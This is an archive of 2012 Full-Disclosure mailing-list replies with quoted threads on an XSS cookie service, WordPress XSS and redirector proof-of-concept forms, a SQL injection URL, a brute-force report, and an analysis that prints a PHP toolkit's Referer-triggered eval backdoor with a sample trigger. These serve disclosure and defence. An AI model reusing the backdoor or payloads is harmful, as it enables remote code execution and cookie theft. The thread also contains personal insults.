>> *On Behalf Of *Laurelai
>> *Sent:* Sunday, June 10, 2012 2:00 PM
>> *To:* full-disclosure@lists.grok.org.uk
>> *Subject:* Re: [Full-disclosure] Obama Order Sped Up Wave of
>> Cyberattacks Against Iran
>>
>>
>>
>> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote:
>>
>> And not capitalizing "Army" when you claim to have spent 10 years of your
>> life in service does precisely the same thing.
>>
>>
>> On Jun 10, 2012, at 3:31 AM, "Laurelai"  wrote:
>>
>>
>>
>>
>>
>>  I dont listen to either. And sorry to burst your bubble but I did serve
>> 10 years in the army.
>>
>>
>>
>> Next I imagine you will insult my gender identity or something equally
>> silly. For the record you should capitalize the first word of each sentence
>> and put a punctuation mark at the end, not doing this just makes you look
>> uneducated and ensures people do not take you seriously.
>>
>>  ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>>
>>  ___
>>
>> Full-Disclosure - We believe in it.
>>
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> Except i don't like the government.
>>
>>  And i hope those antisec kids own the lot of your frauds, really i ask
>> a simple question on how to avoid state sponsored malware that runs
>> exclusively on windows platforms and not a single one of you said anything
>> about using an alternate OS, some of you insisted in fact we should just
>> lie down and take it. You aren't security experts you are scam artists.
>> Makes me wonder if you are paid to act this way or if you all really just
>> didnt consider it. Either answer is pretty chilling.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>  None of you could give the obvious solution to my question and I'm the
> deluded one, right. Let me know when the blow wears off and you want to
> talk for real ok?
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Benji 
Which antisec kids? Unfortunately due to some poeple being utterly delued,
such as yourself, throwing that word around it's rather ambiguous now.

On Sun, Jun 10, 2012 at 10:49 PM, Laurelai  wrote:

>  On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>
>  OK, I’ll bite this one time.  I assert you are blatantly lying about
> military service.  How about tell me your service dates?  Surely you can’t
> consider that any sort of privacy breach.  
>
> ** **
>
> This is an easy way for us to be done with the whole thing.  Part of your
> diatribe is based on your “right” to bitch because of your military
> service.  I, again, assert that is complete fabrication.  As someone who
> actually HAS done work for the government I know (as you should) that your
> military service records are actually public record.  I don’t need your
> service dates, but it will help.  All I need do is fax over form SF-180,
> and they’ll verify your service.
>
> ** **
>
> If you really did serve, I’ll apologize publically.  If you didn’t (or
> don’t provide the information) then we’ll all know you are just a lying
> nutjob and we can ignore you from now on.  Is that fair enough?
>
> ** **
>
> *[image: Description: Description: Description: Description: Description:
> Description: Description: Description: Description: TimSig]***
>
> * *
>
> *Timothy “Thor”  Mullen*
>
> *www.hammerofgod.com*
>
> *Thor’s Microsoft Security 
> Bible
> *
>
> ** **
>
> ** **
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [
> mailto:full-disclosure-boun...@lists.grok.org.uk]
> *On Behalf Of *Laurelai
> *Sent:* Sunday, June 10, 2012 2:00 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
> Against Iran
>
> ** **
>
> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote: 
>
> And not capitalizing "Army" when you claim to have spent 10 years of your
> life in service does precisely the same thing. 
>
>
> On Jun 10, 2012, at 3:31 AM, "Laurelai"  wrote:
>
>
>
> 
>
>   ** **
>
>  I dont listen to either. And sorry to burst your bubble but I did serve
> 10 years in the army.
>
>  ** **
>
> Next I imagine you will insult my gender identity or something equally
> silly. For the record you should capitalize the first word of each sentence
> and put a punctuation mark at the end, not doing this just makes you look
> uneducated and ensures people do not take you seriously.
>
>  ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> 
>
> ___
>
> Full-Disclosure - We believe in it.
>
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>
> Hosted and sponsored by Secunia - http://secunia.com/
>
> Except i don't like the government.
>
> And i hope those antisec kids own the lot of your frauds, really i ask a
> simple question on how to avoid state sponsored malware that runs
> exclusively on windows platforms and not a single one of you said anything
> about using an alternate OS, some of you insisted in fact we should just
> lie down and take it. You aren't security experts you are scam artists.
> Makes me wonder if you are paid to act this way or if you all really just
> didnt consider it. Either answer is pretty chilling.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
<>___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [OT] New online service to make XSSs easier

2012-05-07 Thread Benji 
People using this service definitely wont be up to anything clever or
interesting, so it's barely a concern.

I mean really, this is useful?

On Mon, May 7, 2012 at 4:17 PM, Gage Bystrom  wrote:
> Anyone visiting a compromised site can get the hash, meaning anyone
> who is looking for it can find it and lets any random person(assuming
> stored) visiting to be able to grab all the cookie values.
>
> That's not even my personal concern. My concern is why should I trust
> the owner? Whether you are a black hat, white hat, or myriad of other
> assorted hats  you would be allowing sensitive information to sit on
> this guy's server. How do we know he isn't silently making a copy of
> all the data for his own ends? Simply we don't.
>
> On Mon, May 7, 2012 at 6:03 AM,   wrote:
>> On Mon, 07 May 2012 02:27:33 +0530, karniv0re said:
>>
>>> And this is anonymous.. How??
>>
>> Haven't checked, but if you set up the userid/password via Tor, should
>> be pretty anonymous.
>>
>>> http://www.getmycookie.com/view.m3?hash=
>>
>> And you get somebody else's hash value, how?
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress

2012-05-05 Thread Benji 
Wow, yiou're like the jehovahs witnessess of the internet.

Stop with the childish bitching and grow up. Last time I checked
intern0t was also a script kid breeding ground.

On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories
 wrote:
> Hi List,
>
> To stop MustLive's desperate act of trying to get visitors (and more
> backlinks) to his website, I have for those that doesn't want to go to
> there, just to see the PoC's but actually read them on this mailing list
> like almost _every other_ Proof of Concept / exploit, made them available
> below.
>
> Contents of Wordpress Redirector:
> 
> 
> WordPress Redirector exploit (lol?) (C) 2012 MustLive.
> [removed]
> 
> 
> 
> http://site/wp-comments-post.php"; method="post">
> 
> 
> 
> 
> http://awebsite.tld"; />
> 
> 
> 
> --
>
> Contents of Wordpress XSS:
> 
> 
> WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]
> 
> 
> 
> http://site/wp-comments-post.php"; method="post">
> 
> 
> 
> 
>  value="javascript:alert%28document.cookie%29//" />
> 
> 
> 
> --
>
> I don't really have any comments about these "exploits".
>
>
>
> Best regards,
> Nemesis 3.0
>
>
> On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
> 
> wrote:
>> Hello list!
>>
>> I want to warn you about security vulnerabilities in WordPress.
>>
>> These are Insufficient Anti-automation, Redirector and Cross-Site
>> Scripting
>> vulnerabilities.
>>
>> -
>> Affected products:
>> -
>>
>> Vulnerable are WordPress 2.0 - 3.3.1.
>>
>> --
>> Details:
>> --
>>
>> Already from WP 2.0 there are Insufficient Anti-automation, Redirector
> and
>> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just
> when
>> begun using WP in 2006. If the developers fixed vulnerabilities in
>> previous
>> two redirectors in WP 2.3, then these vulnerabilities were not fixed
> even
>> in
>> WP 3.3.1
>>
>> IAA (WASC-21):
>>
>> Lack of captcha in comment form allows to conduct automated attacks. The
>
>> developers still haven't put captcha in WP comments form (from the first
>
>> version of engine), which besides IAA attacks, also allowed to conduct
>> Redirector and XSS attacks.
>>
>> By default in WordPress the premoderation is turned on, and also there
> is
>> built-in anti-spam filter. But if 10 years ago the premoderation would
> be
>> enough, then long ago this mechanism couldn't be considered as
> sufficient
>> protection against spam, and anti-spam filter had efficiency less then
> 1%
>> -
>> only few from spam messages he marked as spam. And also these mechanisms
>
>> don't protect against below-mentioned attacks. Also plugin Akismet is
>> bundled with WP, which is "captcha-less" protection against spam. But by
>
>> default it's turned off and comparing with captcha it's considered as
> less
>> efficient and also doesn't protect against below-mentioned attacks.
>>
>> Redirector (URL Redirector Abuse) (WASC-38):
>>
>> Exploit:
>>
>> [Removed]
>>
>> XSS (WASC-08):
>>
>> Exploit:
>>
>> [Removed]
>>
>> XSS attack is possible on different browsers, but it's harder to conduct
>
>> then in case of previous two redirectors (via data URI). At IIS web
>> servers
>> the redirect is going via Refresh header, and at other web servers - via
>
>> Location header.
>>
>> Due to nuances of work of this script (filtering of important symbols
> and
>> adding of anchor), for execution of JS code it's needed to use tricky
>> bypass
>> methods. This complexity exists as with javascript URI, as with combo
>> variant javascript URI + data URI.
>>
>> Reliable captcha protects against IAA, Redirector and XSS
> vulnerabilities.
>>
>> 
>> Timeline:
>> 
>>
>> 2012.04.26 - disclosed at my site
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji 
except it was rather obvious why.

On Wed, Apr 25, 2012 at 10:27 AM, Laurelai  wrote:
> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu wrote:
>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
 if you read his "advisories" and "0-days" you know: It's not a joke...
>>> I always thought it was misunderstood performance art...
>>
>>
>> this one appears to be true:
>> http://seclists.org/fulldisclosure/2011/Jul/312
>> Full disclosure is arrest of Sabu
>> (check the date)
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> And thats when sabu was MIA from twitter and everyone knew about that,
> nobody really knew why though.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji 
You should be paranoid if someone could construe what you're doing as illegal.

On Wed, Apr 25, 2012 at 11:07 AM, Laurelai  wrote:
> On 4/25/12 4:59 AM, Benji wrote:
>>
>> And choosing to believe any of the other reasons when you think you're
>> an '1337 hacker' and are involved in that world, is a personality
>> problem, end of.
>>
>> On Wed, Apr 25, 2012 at 10:58 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 4:54 AM, Benji wrote:
>>>>
>>>> No, with open eyes sight. If you chose not to believe the obvious at
>>>> the time, that is your own mistake and proof that you (general you,
>>>> not you specifically) were more interested in being part of the crowd
>>>> than thinking.
>>>>
>>>>
>>>> On Wed, Apr 25, 2012 at 10:52 AM, Laurelai
>>>>  wrote:
>>>>>
>>>>> On 4/25/12 4:48 AM, Benji wrote:
>>>>>>
>>>>>> except it was rather obvious why.
>>>>>>
>>>>>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai
>>>>>>  wrote:
>>>>>>>
>>>>>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>>>>>
>>>>>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu
>>>>>>>> wrote:
>>>>>>>>>
>>>>>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>>>>>
>>>>>>>>>> if you read his "advisories" and "0-days" you know: It's not a
>>>>>>>>>> joke...
>>>>>>>>>
>>>>>>>>> I always thought it was misunderstood performance art...
>>>>>>>>
>>>>>>>>
>>>>>>>> this one appears to be true:
>>>>>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>>>>>> Full disclosure is arrest of Sabu
>>>>>>>> (check the date)
>>>>>>>>
>>>>>>>> ___
>>>>>>>> Full-Disclosure - We believe in it.
>>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>>
>>>>>>> And thats when sabu was MIA from twitter and everyone knew about
>>>>>>> that,
>>>>>>> nobody really knew why though.
>>>>>>>
>>>>>>> ___
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>> In hindsight yes.
>>>
>>> There are any number of reasons why someone, even sabu could have stopped
>>> tweeting then started back up again. It just turned out that this was the
>>> case this time.
>
> I prefer not making assumptions about things i dont have any information on.
>  Sorry you consider that a personality problem :p

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji 
And choosing to believe any of the other reasons when you think you're
an '1337 hacker' and are involved in that world, is a personality
problem, end of.

On Wed, Apr 25, 2012 at 10:58 AM, Laurelai  wrote:
> On 4/25/12 4:54 AM, Benji wrote:
>>
>> No, with open eyes sight. If you chose not to believe the obvious at
>> the time, that is your own mistake and proof that you (general you,
>> not you specifically) were more interested in being part of the crowd
>> than thinking.
>>
>>
>> On Wed, Apr 25, 2012 at 10:52 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 4:48 AM, Benji wrote:
>>>>
>>>> except it was rather obvious why.
>>>>
>>>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai
>>>>  wrote:
>>>>>
>>>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>>>
>>>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu
>>>>>> wrote:
>>>>>>>
>>>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>>>
>>>>>>>> if you read his "advisories" and "0-days" you know: It's not a
>>>>>>>> joke...
>>>>>>>
>>>>>>> I always thought it was misunderstood performance art...
>>>>>>
>>>>>>
>>>>>> this one appears to be true:
>>>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>>>> Full disclosure is arrest of Sabu
>>>>>> (check the date)
>>>>>>
>>>>>> ___
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>> And thats when sabu was MIA from twitter and everyone knew about that,
>>>>> nobody really knew why though.
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> In hindsight yes.
>
> There are any number of reasons why someone, even sabu could have stopped
> tweeting then started back up again. It just turned out that this was the
> case this time.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji 
No, with open eyes sight. If you chose not to believe the obvious at
the time, that is your own mistake and proof that you (general you,
not you specifically) were more interested in being part of the crowd
than thinking.


On Wed, Apr 25, 2012 at 10:52 AM, Laurelai  wrote:
> On 4/25/12 4:48 AM, Benji wrote:
>>
>> except it was rather obvious why.
>>
>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>
>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu wrote:
>>>>>
>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>
>>>>>> if you read his "advisories" and "0-days" you know: It's not a joke...
>>>>>
>>>>> I always thought it was misunderstood performance art...
>>>>
>>>>
>>>> this one appears to be true:
>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>> Full disclosure is arrest of Sabu
>>>> (check the date)
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>> And thats when sabu was MIA from twitter and everyone knew about that,
>>> nobody really knew why though.
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>
> In hindsight yes.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Erronous post concerning Backtrack 5 R2 0day

2012-04-12 Thread Benji 
in soviet russia, lesson teaches you. in west, no lesson learnt by anyone.

On Thu, Apr 12, 2012 at 9:51 PM, Adam Behnke  wrote:
> Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2:
> http://seclists.org/fulldisclosure/2012/Apr/123
>
> The posting was incorrect, the vulnerability was NOT in Backtrack but in
> wicd, no Backtrack contributed code is vulnerable. When we tweeted and
> emailed to mailing lists the notifications of this vulnerability, we
> incorrectly shortened the title and called it "Backtrack 5 R2 priv
> escalation 0day ", which is misleading and could lead people to believe the
> bug was actually in Backtrack. The bug has always resided in wicd and not in
> any Backtrack team written code. We apologize for the confusion to the
> Backtrack team and any other persons affected by this error. We feel the
> Backtrack distro is a great piece of software and wish muts and the rest of
> the team the best.
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Compromised VPN provider out there?

2012-04-10 Thread Benji 
> How came im not surprised that public proxies are being abused for brute
> force attacks?

You're just that far ahead of the curve?

On Tue, Apr 10, 2012 at 5:17 AM,   wrote:
>> Hi
>>
>> To any security-aware VPN providers out there reading this:
>>
>> More than 800 hosts (mostly from Asia) started hitting TorVPN.com's
>> webserver on HTTPS with login requests.
>>
>> Before blocking them all (and adding them to the proxy list section of my
>> site after testing, heh)
>> I decided to temporarily log the attempted usernames and passwords for a
>> few seconds to see what the deal was.
>>
>> The usernames and passwords do not seem to be from dictionaries, more like
>> someone got a hold of plaintext
>> userinfo from somewhere and figured enough of them could be valid for
>> TorVPN.com to make it worth
>> the time to write a script and start bruteforcing (and monitor results,
>> because when I changed the login
>> URL, they updated their script in less than 5 minutes).
>>
>> I believe the most likely reason for an attacker to try check for password
>> re-use on my site is if their
>> accounts are from another VPN provider's database - which is why I am
>> writing this.
>>
>> Below you will find a list of usernames (not posting the passwords) that
>> were logged in those few seconds.
>> (None of them are actual real users on TorVPN, they are not part of any
>> public list that can be found with Google)
>>
>>   - vlai1214
>>   - BHGboat
>>   - haines
>>   - Mod95TZc
>>   - JJOM54
>>   - johnnieak
>>   - hair7
>>   - hair18
>>   - flipperke
>>   - outhcent
>>   - haipas
>>   - hainline
>>   - anxdpphh2334
>>   - rgcBCN
>>   - Pretty26
>>   - hair11
>>   - hairaP
>>   - cyrren
>>   - tomba73
>>   - mikemaynard25a
>>   - jamesmorrow
>>   - lending2
>>   - laynec
>>   - willthekiller
>>   - chrisn
>>   - chulony79
>>   - firefox
>>
>> If someone-who-isn't-me obtains similar info from an attack, manages to
>> log in to another VPN provider
>> with the logged accounts, sends me an e-mail about this success, I will
>> post the results.
>>
>> If anyone has already experienced a similar password bruteforce on their
>> VPN-website, do not hesitate to post details.
>>
>> Whoever hammered my server, I'd like to thank you for possibly helping to
>> uncover an ownage, as well as for helping me
>> re-fill the list of proxies on my site with working ones.
>>
>> Kind regards,
>> https://torvpn.com/
>>
>> ps: a couple of IPs with the most attempts
>>
>> # 189.127.120.253 -> 927
>> # 64.79.72.52 -> 868
>> # 186.225.60.90 -> 785
>> # 217.112.128.247 -> 732
>> # 203.122.19.11 -> 699
>> # 178.132.216.182 -> 699
>> # 146.255.9.124 -> 664
>> # 222.165.175.246 -> 646
>> # 188.230.77.233 -> 632
>> # 190.90.100.103 -> 584
>> # 188.241.71.1 -> 583
>> # 201.65.25.85 -> 563
>> # 202.47.88.46 -> 561
>> # 208.94.244.15 -> 494
>> # 187.0.32.6 -> 485
>> # 210.212.144.214 -> 484
>> # 196.1.178.254 -> 474
>> # 201.234.220.99 -> 474
>> # 190.145.74.10 -> 472
>> # 184.164.142.214 -> 465
>> # 89.235.50.141 -> 461
>> # 175.111.192.12 -> 461
>> # 186.225.106.146 -> 450
>> # 188.127.231.78 -> 450
>> # 200.1.110.146 -> 449
>> # 93.99.16.254 -> 434
>> # 84.22.50.42 -> 422
>> # 93.89.84.220 -> 401
>> # 201.234.58.212 -> 396
>> # 187.60.96.7 -> 379
>> # 125.21.55.194 -> 374
>> # 121.254.133.150 -> 366
>> # 202.46.69.4 -> 363
>> # 157.181.228.181 -> 361
>> # 201.49.77.7 -> 361
>> # 46.4.33.41 -> 360
>> # 206.212.249.237 -> 358
>> # 202.29.97.2 -> 355
>> # 46.162.1.253 -> 354
>>
>>
>
> Just due to curiosity, I picked up the first proxy (189.127.120.253) and
> ran it against http://nixapi.com/ip-reputation-lookup. The result was
> 'HTTP L3 (Transparent) proxy 189.127.120.253:3128 - Verified 03:49:38
> ago.'
>
> How came im not surprised that public proxies are being abused for brute
> force attacks? About a year ago, I setup a public proxy for testing
> purposes, after ~two day uptime what I can remember;
>
> Over 500 simultaneus connections all the time
> I think there was only 0.1% human users, the rest were abuse bots/scripts
> Bandwidth used constantly: 15-50Mbps/second (I remember capping it to
> 50Mbps) to prevent network lag issues to other services)
>
> There were several hundreds of thousand connections in very short time ...
>
>
>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cookie based SQL Injection

2012-03-06 Thread Benji 
Yes, because this is incredibly new.

On Tue, Mar 6, 2012 at 8:54 PM, Zach C.  wrote:

> Even so, watch all the advisories pour in now for "cookie-based SQL
> injection." :/
> On Mar 6, 2012 12:44 PM,  wrote:
>
>> On Tue, 06 Mar 2012 14:28:51 CST, Adam Behnke said:
>> > Unlike other parameters, cookies are not supposed to be handled by
>> users.
>>
>> Any site that designs its security model around that concept will get what
>> it richly deserves.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PHP Gift Registry 1.5.5 SQL Injection

2012-02-24 Thread Benji 
plz to tell me how long you left cluster fuzzer running to find this hole
size of a pin?

On Fri, Feb 24, 2012 at 3:08 PM, Thomas Richards  wrote:

> # Exploit Title: PHP Gift Registry 1.5.5 SQL Injection
> # Date: 02/22/12
> # Author: G13
> # Software Link: https://sourceforge.net/projects/phpgiftreg/
> # Version: 1.5.5
> # Category: webapps (php)
> #
>
> # Vulnerability #
>
> The userid parameter in the users.php file is vulnerable to SQL Injection.
>
> A user must be signed in to exploit this.
>
> # Vendor Notification #
>
> 02/22/12 - Vendor Notified
> 02/24/12 - No response, disclosure
>
> # Exploit #
>
> http://localhost/phpgiftreg/users.php?action=edit&userid=[SQLi]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Analysis of the "r00t 4 LFI Toolkit"

2012-02-20 Thread Benji 
A priv8 php shell, funniest thing I've ever heard on this list.

On Mon, Feb 20, 2012 at 1:37 PM, Gage Bystrom wrote:

> Uhh no, you misread what he said. He's saying he's seen that code in a few
> php shells that were supposedly meant to be private but the authors were
> miserable failures and he found the code anyways, not that he wrote it.
> On Feb 20, 2012 12:36 AM, "Manu"  wrote:
>
>> But you saw it in a few """priv8""" php shells? And you say that is your
>> code as 'r00t 4 LFI toolkit' ? Pathetic
>>
>>
>> 2012/2/19 InterN0T Advisories 
>>
>>> Thank you for the response, I didn't know it was included in the Weevely
>>> tool, but I did see it used in a few "priv8" PHP shells too.
>>>
>>> On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis
>>>  wrote:
>>> > The backdoor PHP code that you included is exactly the same as
>>> generated
>>> > by Weevely [1] tool, until the 0.4 version of the tool.
>>> >
>>> > For convenience I include the base64 decoded Weevely code here too:
>>> >
>>> > ini_set('error_log','/dev/null');
>>> > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' &&
>>> > count($a)==9) {echo '';eval(base64_decode(str_replace(" ", "+",
>>> > join(array_slice($a,count($a)-3);echo '';}
>>> >
>>> >
>>> > For more details you can refer at a relevant post I wrote recently [2].
>>> >
>>> > I haven't dig into "r00t 4 LFI" source code, but from your analysis the
>>> > similarities are pretty obvious.
>>> >
>>> > ps: This email has been BCC'ed to Weevely developer.
>>> >
>>> >
>>> > [1] http://code.google.com/p/weevely/
>>> > [2]
>>> https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/
>>> >
>>> >
>>> > On 02/19/2012 07:01 PM, InterN0T Advisories wrote:
>>> >> Dear Full Disclosure readers,
>>> >>
>>> >>
>>> >> Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI
>>> >> Toolkit", that according to its description:
>>> >> ---
>>> >> This tool is a php script that assists in performing local file
>>> inclusion
>>> >> attacks.
>>> >> ---
>>> >>
>>>  Should be able to perform local file inclusion attacks.
>>> >>
>>> >>
>>> >> -:: Overview ::-
>>> >>
>>> >> After studying this tool for a brief 5 minutes, it was obvious that it
>>> >> was
>>> >> nowhere what I hoped it to be, as the tool only use one method, the
>>> >> "/proc/self/environ" vector (as seen on e.g., the intern0t forums and
>>> >> many
>>> >> other sites).
>>> >>
>>> >> The tool is therefore, not capable of performing "attacks", but only
>>> 1,
>>> >> single type of LFI attack. (Note that the 'S' has been removed.)
>>> >>
>>> >> The method this tool uses, is far from new and doesn't always work
>>> >> either,
>>> >> but it's a nice trick that e.g., SirGod wrote about on the intern0t
>>> >> forums
>>> >> in 2009. (This tool was released the 18th February 2012.)
>>> >>
>>> >>
>>> >> -:: Vulnerabilities ::-
>>> >>
>>> >> Further study of this tool reveals:
>>> >> - None of the output from the tool is sanitized, meaning the attacker
>>> >> using the script, can get XSS'd (and CSRF'd), if the target has
>>> changed
>>> >> e.g., the 'uname -a' command (which is relatively simple to do), to
>>> >> include
>>> >> (print) JavaScript instead. If this happens, the attacker may end up
>>> >> attacking himself, crashing or something third, depending on the type
>>> of
>>> >> XSS payload.
>>> >>
>>> >> - The most interesting part, is on line 92, where the "developer"
>>> >> (KedAns-Dz), has decided to >>backdoor<< the tool.
>>> >>
>>> >>
>>> >> -:: The Backdoor ::-
>>> >>
>>> >> Analysis of the backdoor:
>>> >> By sending a HTTP request, that includes a specially crafted referer,
>>> it
>>> >> is possible to execute PHP code:
>>> >> ---
>>> >> Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
>>> >> ---
>>> >>
>>> >>
>>> >> This referer will make the script execute: phpinfo();
>>> >>
>>> >>
>>> >> -:: Code Review ::-
>>> >>
>>> >> The code that enables the developer to use the script as a backdoor
>>> looks
>>> >> like the following:
>>> >> ---
>>> >> parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
>>> >> count($a)==9) { echo '';eval(base64_decode(str_replace(" ", "+",
>>> >> join(array_slice($a,count($a)-3);echo '';}
>>> >> ---
>>> >>
>>> >>
